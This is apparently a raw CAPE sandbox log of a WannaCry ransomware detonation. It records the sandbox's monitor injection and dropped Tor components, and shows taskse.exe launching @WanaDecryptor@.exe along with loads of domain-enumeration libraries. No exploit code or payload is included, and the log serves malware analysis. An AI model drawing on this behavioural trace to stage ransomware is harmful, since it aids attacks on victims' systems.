2025-12-08 09:09:37,234 [root] DEBUG: 2124: Dropped file limit defaulting to 100.
2025-12-08 09:09:37,234 [root] DEBUG: 2440: NtTerminateProcess hook: Attempting to dump process 2440
2025-12-08 09:09:37,234 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:37,234 [root] DEBUG: 2440: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:09:37,234 [root] DEBUG: 2124: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:37,234 [root] INFO: Process with pid 2440 has terminated
2025-12-08 09:09:37,234 [root] DEBUG: 2124: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:09:37,249 [root] DEBUG: 2124: Monitor initialised: 32-bit capemon loaded in process 2124 at 0x74260000, thread 2596, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:09:37,249 [root] DEBUG: 2124: Commandline: @WanaDecryptor@.exe  vs
2025-12-08 09:09:37,249 [root] DEBUG: 2124: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:37,249 [root] DEBUG: 2124: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:37,249 [root] DEBUG: 2124: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:37,249 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:37,249 [root] DEBUG: 2124: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:37,249 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:37,249 [root] DEBUG: 2124: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:37,265 [root] DEBUG: 2124: Hooked 611 out of 613 functions
2025-12-08 09:09:37,265 [root] DEBUG: 2124: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:37,265 [root] DEBUG: 2124: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x240000
2025-12-08 09:09:37,265 [root] INFO: Loaded monitor into process with pid 2124
2025-12-08 09:09:37,265 [root] DEBUG: 2124: DLL loaded at 0x71E10000: C:\Windows\system32\odbcint (0x38000 bytes).
2025-12-08 09:09:37,265 [root] DEBUG: 2124: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x004131BD, thread 2596).
2025-12-08 09:09:37,265 [root] DEBUG: 2124: caller_dispatch: Scanning calling region at 0x00400000...
2025-12-08 09:09:37,265 [root] DEBUG: 2124: YaraScan: Scanning 0x00400000, size 0x3d000
2025-12-08 09:09:37,265 [root] DEBUG: 2124: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:37,265 [root] DEBUG: 2124: DLL loaded at 0x71E00000: C:\Windows\system32\RICHED32 (0x6000 bytes).
2025-12-08 09:09:37,265 [root] DEBUG: 2124: DLL loaded at 0x71D70000: C:\Windows\system32\RICHED20 (0x76000 bytes).
2025-12-08 09:09:37,265 [root] DEBUG: 2124: DLL loaded at 0x74AC0000: C:\Windows\system32\uxtheme (0x80000 bytes).
2025-12-08 09:09:37,281 [root] DEBUG: 2124: DLL loaded at 0x739B0000: C:\Windows\system32\dwmapi (0x13000 bytes).
2025-12-08 09:09:37,281 [root] DEBUG: 2124: api-rate-cap: GetSystemMetrics hook disabled due to rate
2025-12-08 09:09:37,656 [root] DEBUG: 1212: DLL loaded at 0x000007FEF2DA0000: C:\Windows\system32\thumbcache (0x1f000 bytes).
2025-12-08 09:09:37,656 [root] DEBUG: 1212: DLL loaded at 0x0000000077910000: C:\Windows\system32\PSAPI (0x7000 bytes).
2025-12-08 09:09:37,687 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
2025-12-08 09:09:37,750 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
2025-12-08 09:09:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
2025-12-08 09:09:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
2025-12-08 09:09:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
2025-12-08 09:09:37,781 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
2025-12-08 09:09:37,796 [lib.api.process] INFO: Monitor config for <Process 556 svchost.exe>: C:\tmp2azv04x4\dll\556.ini
2025-12-08 09:09:37,812 [lib.api.process] INFO: 64-bit DLL to inject is C:\tmp2azv04x4\dll\YZitKGI.dll, loader C:\tmp2azv04x4\bin\kTlnsNzT.exe
2025-12-08 09:09:37,812 [root] DEBUG: Loader: Injecting process 556 with C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:37,828 [root] DEBUG: 556: Python path set to 'C:\Python38'.
2025-12-08 09:09:37,828 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:37,828 [root] DEBUG: 556: Dropped file limit defaulting to 100.
2025-12-08 09:09:37,828 [root] DEBUG: 556: parent_has_path: unable to get path for parent process 432
2025-12-08 09:09:37,828 [root] DEBUG: 556: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:37,828 [root] DEBUG: 556: YaraScan: Scanning 0x00000000FF1E0000, size 0xa052
2025-12-08 09:09:37,828 [root] DEBUG: 556: Monitor initialised: 64-bit capemon loaded in process 556 at 0x000007FEF30B0000, thread 1048, image base 0x00000000FF1E0000, stack from 0x0000000001B16000-0x0000000001B20000
2025-12-08 09:09:37,828 [root] DEBUG: 556: Commandline: C:\Windows\system32\svchost.exe -k DcomLaunch
2025-12-08 09:09:37,828 [root] DEBUG: 556: GetAddressByYara: ModuleBase 0x0000000077760000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:37,843 [root] WARNING: b'Unable to place hook on LockResource'
2025-12-08 09:09:37,843 [root] DEBUG: 556: set_hooks: Unable to hook LockResource
2025-12-08 09:09:37,843 [root] DEBUG: 556: Hooked 605 out of 606 functions
2025-12-08 09:09:37,859 [root] INFO: Loaded monitor into process with pid 556
2025-12-08 09:09:37,859 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2025-12-08 09:09:37,859 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\YZitKGI.dll.
2025-12-08 09:09:37,859 [lib.api.process] INFO: Injected into 64-bit <Process 556 svchost.exe>
2025-12-08 09:09:38,093 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 1316, handle 0x568: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe
2025-12-08 09:09:38,218 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\libeay32.dll
2025-12-08 09:09:38,249 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
2025-12-08 09:09:38,281 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent_core-2-0-5.dll
2025-12-08 09:09:38,296 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent_extra-2-0-5.dll
2025-12-08 09:09:38,328 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll
2025-12-08 09:09:38,343 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
2025-12-08 09:09:38,359 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\ssleay32.dll
2025-12-08 09:09:38,406 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\tor.exe
2025-12-08 09:09:38,437 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\zlib1.dll
2025-12-08 09:09:38,437 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
2025-12-08 09:09:38,453 [root] DEBUG: 1740: CreateProcessHandler: Injection info set for new process 1144: C:\Users\user\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe, ImageBase: 0x00E40000
2025-12-08 09:09:38,453 [root] INFO: Announced 32-bit process name: taskhsvc.exe pid: 1144
2025-12-08 09:09:38,453 [lib.api.process] INFO: Monitor config for <Process 1144 taskhsvc.exe>: C:\tmp2azv04x4\dll\1144.ini
2025-12-08 09:09:38,468 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:38,468 [root] DEBUG: Loader: Injecting process 1144 (thread 2000) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,468 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:38,468 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,468 [lib.api.process] INFO: Injected into 32-bit <Process 1144 taskhsvc.exe>
2025-12-08 09:09:38,468 [root] DEBUG: 1740: DLL loaded at 0x73910000: C:\Windows\system32\apphelp (0x4c000 bytes).
2025-12-08 09:09:38,484 [root] INFO: Announced 32-bit process name: taskhsvc.exe pid: 1144
2025-12-08 09:09:38,484 [lib.api.process] INFO: Monitor config for <Process 1144 taskhsvc.exe>: C:\tmp2azv04x4\dll\1144.ini
2025-12-08 09:09:38,484 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:38,500 [root] DEBUG: Loader: Injecting process 1144 (thread 2000) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,500 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:38,500 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,500 [lib.api.process] INFO: Injected into 32-bit <Process 1144 taskhsvc.exe>
2025-12-08 09:09:38,546 [root] DEBUG: 1144: Python path set to 'C:\Python38'.
2025-12-08 09:09:38,546 [root] DEBUG: 1144: Dropped file limit defaulting to 100.
2025-12-08 09:09:38,562 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:38,562 [root] DEBUG: 1144: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:38,562 [root] DEBUG: 1144: YaraScan: Scanning 0x00E40000, size 0x2fdd44
2025-12-08 09:09:38,562 [root] DEBUG: 1144: Monitor initialised: 32-bit capemon loaded in process 1144 at 0x74260000, thread 2000, image base 0xe40000, stack from 0x466000-0x470000
2025-12-08 09:09:38,578 [root] DEBUG: 1144: Commandline: TaskData\Tor\taskhsvc.exe
2025-12-08 09:09:38,578 [root] DEBUG: 1144: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:38,578 [root] DEBUG: 1144: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:38,578 [root] DEBUG: 1144: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:38,578 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:38,578 [root] DEBUG: 1144: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:38,578 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:38,578 [root] DEBUG: 1144: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:38,578 [root] DEBUG: 1144: Hooked 611 out of 613 functions
2025-12-08 09:09:38,578 [root] DEBUG: 1144: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:38,578 [root] DEBUG: 1144: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x140000
2025-12-08 09:09:38,578 [root] INFO: Loaded monitor into process with pid 1144
2025-12-08 09:09:38,578 [root] DEBUG: 1144: caller_dispatch: Added region at 0x71CC0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x71CC235F, thread 2000).
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71CC0000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libssp-0.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: DLL loaded at 0x73140000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2025-12-08 09:09:38,593 [root] DEBUG: 1144: DLL loaded at 0x73100000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2025-12-08 09:09:38,593 [root] DEBUG: 1144: caller_dispatch: Added region at 0x71C40000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x71C543FF, thread 2000).
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71C40000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: caller_dispatch: Added region at 0x71CE0000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x71D1FFDF, thread 2000).
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71CE0000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71CE0000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71CE0000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: caller_dispatch: Added region at 0x71A20000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x71B94FAF, thread 2000).
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71A20000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libeay32.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProtectionHandler: Processing previous tracked region at: 0x71CE0000.
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71CE0000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71A20000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libeay32.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71A20000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libeay32.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: caller_dispatch: Added region at 0x71990000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x719E028F, thread 2000).
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71990000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\ssleay32.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProtectionHandler: Processing previous tracked region at: 0x71A20000.
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71A20000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\libeay32.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71990000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\ssleay32.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71990000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\ssleay32.dll, skipping
2025-12-08 09:09:38,593 [root] DEBUG: 1144: caller_dispatch: Added region at 0x71960000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x71972BFF, thread 2000).
2025-12-08 09:09:38,609 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71960000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\zlib1.dll, skipping
2025-12-08 09:09:38,609 [root] DEBUG: 1144: ProtectionHandler: Processing previous tracked region at: 0x71990000.
2025-12-08 09:09:38,609 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71990000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\ssleay32.dll, skipping
2025-12-08 09:09:38,609 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71960000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\zlib1.dll, skipping
2025-12-08 09:09:38,609 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71960000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\zlib1.dll, skipping
2025-12-08 09:09:38,609 [root] DEBUG: 1144: caller_dispatch: Added region at 0x00E40000 to tracked regions list (kernel32::GetSystemTimeAsFileTime returns to 0x01076F4F, thread 2000).
2025-12-08 09:09:38,609 [root] DEBUG: 1144: YaraScan: Scanning 0x00E40000, size 0x2fdd44
2025-12-08 09:09:38,625 [root] DEBUG: 1144: ProcessImageBase: Main module image at 0x00E40000 unmodified (entropy change 0.000000e+00)
2025-12-08 09:09:38,625 [root] DEBUG: 1144: ProtectionHandler: Processing previous tracked region at: 0x71960000.
2025-12-08 09:09:38,625 [root] DEBUG: 1144: ProcessTrackedRegion: Region at 0x71960000 mapped as \Device\HarddiskVolume2\Users\user\AppData\Local\Temp\TaskData\Tor\zlib1.dll, skipping
2025-12-08 09:09:38,625 [root] DEBUG: 1144: YaraScan: Scanning 0x00E40000, size 0x2fdd44
2025-12-08 09:09:38,640 [root] DEBUG: 1144: ProcessImageBase: Main module image at 0x00E40000 unmodified (entropy change 2.738872e-05)
2025-12-08 09:09:38,640 [root] DEBUG: 1144: YaraScan: Scanning 0x00E40000, size 0x2fdd44
2025-12-08 09:09:38,656 [root] DEBUG: 1144: ProcessImageBase: Main module image at 0x00E40000 unmodified (entropy change 6.874888e-03)
2025-12-08 09:09:38,656 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2928: C:\Users\user\AppData\Local\Temp\taskse.exe, ImageBase: 0x00400000
2025-12-08 09:09:38,656 [root] DEBUG: 1144: DLL loaded at 0x71DF0000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2025-12-08 09:09:38,656 [root] INFO: Announced 32-bit process name: taskse.exe pid: 2928
2025-12-08 09:09:38,656 [root] DEBUG: 1144: hook_api: Warning - NetUserGetInfo export address 0x7194528E differs from GetProcAddress -> 0x71DF1BE2 (SAMCLI.DLL::0x1be2)
2025-12-08 09:09:38,656 [lib.api.process] INFO: Monitor config for <Process 2928 taskse.exe>: C:\tmp2azv04x4\dll\2928.ini
2025-12-08 09:09:38,656 [root] DEBUG: 1144: DLL loaded at 0x71930000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2025-12-08 09:09:38,656 [root] DEBUG: 1144: hook_api: Warning - NetGetJoinInformation export address 0x71944AD2 differs from GetProcAddress -> 0x71932C3F (WKSCLI.DLL::0x2c3f)
2025-12-08 09:09:38,656 [root] DEBUG: 1144: hook_api: Warning - NetUserGetLocalGroups export address 0x719452A4 differs from GetProcAddress -> 0x71DF28AA (SAMCLI.DLL::0x28aa)
2025-12-08 09:09:38,656 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:38,656 [root] DEBUG: 1144: DLL loaded at 0x71900000: C:\Windows\system32\LOGONCLI (0x22000 bytes).
2025-12-08 09:09:38,671 [root] DEBUG: 1144: hook_api: Warning - DsEnumerateDomainTrustsW export address 0x71943C9E differs from GetProcAddress -> 0x7190B202 (LOGONCLI.DLL::0xb202)
2025-12-08 09:09:38,671 [root] DEBUG: 556: OpenProcessHandler: Injection info created for process 584, handle 0x624: C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe
2025-12-08 09:09:38,671 [root] DEBUG: Loader: Injecting process 2928 (thread 2312) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,671 [root] DEBUG: 1144: DLL loaded at 0x71940000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2025-12-08 09:09:38,671 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:38,671 [root] DEBUG: 1144: DLL loaded at 0x718F0000: C:\Windows\system32\netutils (0x9000 bytes).
2025-12-08 09:09:38,671 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,671 [lib.api.process] INFO: Injected into 32-bit <Process 2928 taskse.exe>
2025-12-08 09:09:38,687 [root] DEBUG: 1144: DLL loaded at 0x718D0000: C:\Windows\system32\srvcli (0x19000 bytes).
2025-12-08 09:09:38,687 [root] INFO: Announced 32-bit process name: taskse.exe pid: 2928
2025-12-08 09:09:38,687 [root] DEBUG: 1144: caller_dispatch: Added region at 0x007A0000 to tracked regions list (ntdll::LdrGetProcedureAddress returns to 0x007A0000, thread 2000).
2025-12-08 09:09:38,687 [lib.api.process] INFO: Monitor config for <Process 2928 taskse.exe>: C:\tmp2azv04x4\dll\2928.ini
2025-12-08 09:09:38,687 [root] DEBUG: 1144: DumpPEsInRange: Scanning range 0x007A0000 - 0x007AFFFB.
2025-12-08 09:09:38,687 [root] DEBUG: 1144: ScanForDisguisedPE: No PE image located in range 0x007A0000-0x007AFFFB.
2025-12-08 09:09:38,687 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:38,703 [lib.common.results] INFO: Uploading file C:\fJCIHnd\CAPE\1144_20472603819681122025 to CAPE\3120e65487c953a7980142c43eb01bf9bbf512877d1c52a569939212e4efae47; Size is 65531; Max size: 100000000
2025-12-08 09:09:38,703 [root] DEBUG: Loader: Injecting process 2928 (thread 2312) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,703 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2025-12-08 09:09:38,703 [root] DEBUG: Successfully injected DLL C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,703 [lib.api.process] INFO: Injected into 32-bit <Process 2928 taskse.exe>
2025-12-08 09:09:38,718 [root] DEBUG: 1144: DumpMemory: Payload successfully created: C:\fJCIHnd\CAPE\1144_20472603819681122025 (size 65531 bytes)
2025-12-08 09:09:38,718 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 816: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe, ImageBase: 0x00400000
2025-12-08 09:09:38,718 [root] DEBUG: 2928: Python path set to 'C:\Python38'.
2025-12-08 09:09:38,718 [root] DEBUG: 1144: DumpRegion: Dumped entire allocation from 0x007A0000, size 65536 bytes.
2025-12-08 09:09:38,718 [root] DEBUG: 2928: Dropped file limit defaulting to 100.
2025-12-08 09:09:38,718 [root] INFO: Announced 32-bit process name: @WanaDecryptor@.exe pid: 816
2025-12-08 09:09:38,718 [root] DEBUG: 1144: ProcessTrackedRegion: Dumped region at 0x007A0000.
2025-12-08 09:09:38,718 [lib.api.process] INFO: Monitor config for <Process 816 @WanaDecryptor@.exe>: C:\tmp2azv04x4\dll\816.ini
2025-12-08 09:09:38,718 [root] INFO: Disabling sleep skipping.
2025-12-08 09:09:38,718 [root] DEBUG: 1144: YaraScan: Scanning 0x007A0000, size 0xfffb
2025-12-08 09:09:38,718 [root] DEBUG: 2928: YaraInit: Compiled rules loaded from existing file C:\tmp2azv04x4\data\yara\capemon.yac
2025-12-08 09:09:38,734 [root] DEBUG: 1144: api-rate-cap: NtAllocateVirtualMemory hook disabled due to rate
2025-12-08 09:09:38,734 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmp2azv04x4\dll\DnmqJaf.dll, loader C:\tmp2azv04x4\bin\tdTRznO.exe
2025-12-08 09:09:38,796 [root] DEBUG: 2928: YaraScan: Scanning 0x00400000, size 0x5000
2025-12-08 09:09:38,796 [root] DEBUG: 2928: Monitor initialised: 32-bit capemon loaded in process 2928 at 0x74260000, thread 2312, image base 0x400000, stack from 0x186000-0x190000
2025-12-08 09:09:38,796 [root] DEBUG: 1144: api-rate-cap: NtUnmapViewOfSection hook disabled due to rate
2025-12-08 09:09:38,812 [root] DEBUG: 2928: Commandline: taskse.exe C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe
2025-12-08 09:09:38,812 [root] DEBUG: 1144: api-rate-cap: NtMapViewOfSection hook disabled due to rate
2025-12-08 09:09:38,812 [root] DEBUG: 2928: GetAddressByYara: ModuleBase 0x77920000 FunctionName LdrpCallInitRoutine
2025-12-08 09:09:38,828 [root] DEBUG: 1144: DLL loaded at 0x71950000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2025-12-08 09:09:38,828 [root] DEBUG: 2928: hook_api: Warning - CreateRemoteThreadEx export address 0x7744A337 differs from GetProcAddress -> 0x75A8403A (KERNELBASE.dll::0x1403a)
2025-12-08 09:09:38,828 [root] DEBUG: 1144: hook_api: Warning - NetUserGetInfo export address 0x7192528E differs from GetProcAddress -> 0x71951BE2 (SAMCLI.DLL::0x1be2)
2025-12-08 09:09:38,828 [root] DEBUG: 2928: hook_api: Warning - UpdateProcThreadAttribute export address 0x7744ABB7 differs from GetProcAddress -> 0x75A7FA26 (KERNELBASE.dll::0xfa26)
2025-12-08 09:09:38,828 [root] DEBUG: 1144: DLL loaded at 0x71DF0000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2025-12-08 09:09:38,828 [root] WARNING: b'Unable to place hook on GetCommandLineA'
2025-12-08 09:09:38,828 [root] DEBUG: 1144: hook_api: Warning - NetGetJoinInformation export address 0x71924AD2 differs from GetProcAddress -> 0x71DF2C3F (WKSCLI.DLL::0x2c3f)
2025-12-08 09:09:38,843 [root] DEBUG: 2928: set_hooks: Unable to hook GetCommandLineA
2025-12-08 09:09:38,843 [root] DEBUG: 1144: hook_api: Warning - NetUserGetLocalGroups export address 0x719252A4 differs from GetProcAddress -> 0x719528AA (SAMCLI.DLL::0x28aa)
2025-12-08 09:09:38,843 [root] DEBUG: 1144: DLL loaded at 0x718F0000: C:\Windows\system32\LOGONCLI (0x22000 bytes).
2025-12-08 09:09:38,843 [root] WARNING: b'Unable to place hook on GetCommandLineW'
2025-12-08 09:09:38,843 [root] DEBUG: Loader: Injecting process 816 (thread 2508) with C:\tmp2azv04x4\dll\DnmqJaf.dll.
2025-12-08 09:09:38,843 [root] DEBUG: 1144: hook_api: Warning - DsEnumerateDomainTrustsW export address 0x71923C9E differs from GetProcAddress -> 0x718FB202 (LOGONCLI.DLL::0xb202)
2025-12-08 09:09:38,843 [root] DEBUG: 2928: set_hooks: Unable to hook GetCommandLineW
2025-12-08 09:09:38,843 [root] DEBUG: 2928: Hooked 611 out of 613 functions
2025-12-08 09:09:38,843 [root] DEBUG: 1144: DLL loaded at 0x71920000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2025-12-08 09:09:38,859 [root] DEBUG: 2928: WoW64 detected: 64-bit ntdll base: 0x77760000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x777cb510, Wow64PrepareForException: 0x0
2025-12-08 09:09:38,859 [root] DEBUG: 1144: DLL loaded at 0x71940000: C:\Windows\system32\netutils (0x9000 bytes).
2025-12-08 09:09:38,859 [root] DEBUG: 2928: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x330000
2025-12-08 09:09:38,859 [root] DEBUG: 1144: DLL loaded at 0x718B0000: C:\Windows\system32\srvcli (0x19000 bytes).
2025-12-08 09:09:38,859 [root] INFO: Loaded monitor into process with pid 2928
2025-12-08 09:09:38,875 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2025-12-08 09:09:38,875 [root] DEBUG: 1144: caller_dispatch: Added region at 0x71920000 to tracked regions list (ntdll::memcpy returns to 0x71926484, thread 2000).
2025-12-08 09:09:38,875 [root] DEBUG: 2928: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x00401607, thread 2312).
